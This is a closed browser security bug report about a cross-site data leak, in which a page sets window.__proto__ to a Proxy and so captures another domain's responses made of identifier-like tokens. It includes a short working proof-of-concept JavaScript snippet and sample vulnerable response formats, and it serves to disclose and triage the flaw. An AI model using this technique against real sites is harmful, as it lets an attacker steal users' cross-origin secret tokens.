Closed Bug 1099081 Opened 10 years ago Closed 10 years ago

Cross-site data leak using window.__proto__ = new Proxy

Categories

(Core :: Security, defect)

Product:
Core
Component:
Security
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 1048535

People

(Reporter: till, Unassigned)

References

(
URL
)

Details

(Keywords: sec-moderate, wsec-disclosure) 

Setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens.

See https://twitter.com/steike/status/533198334547468288 for a POC.

It's actually even simpler to implement this using ES6-style proxies:

window.__proto__ = new Proxy({}, {
    get: function(target, name) {console.log(name); return true;},
    has: function(target, name) {return true}
});

Examples of request results this works for:
"foo05120820e156c2f445f670759be64420" (from the original POC)
"foo,bar"
foo,
bar,
baz"
"foo;bar"
Calling this sec-moderate (maybe even sec-low?, because it relies on a web app that is not securing its "secret tokens" in a best practice way.

Dan, can you think of something we could do about this?
Keywords: sec-moderate, wsec-disclosure
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
This bug has been marked as a duplicate of a restricted bug.
If it's an exact duplicate, we should consider opening up bug 1048535.
You need to log in before you can comment on or make changes to this bug.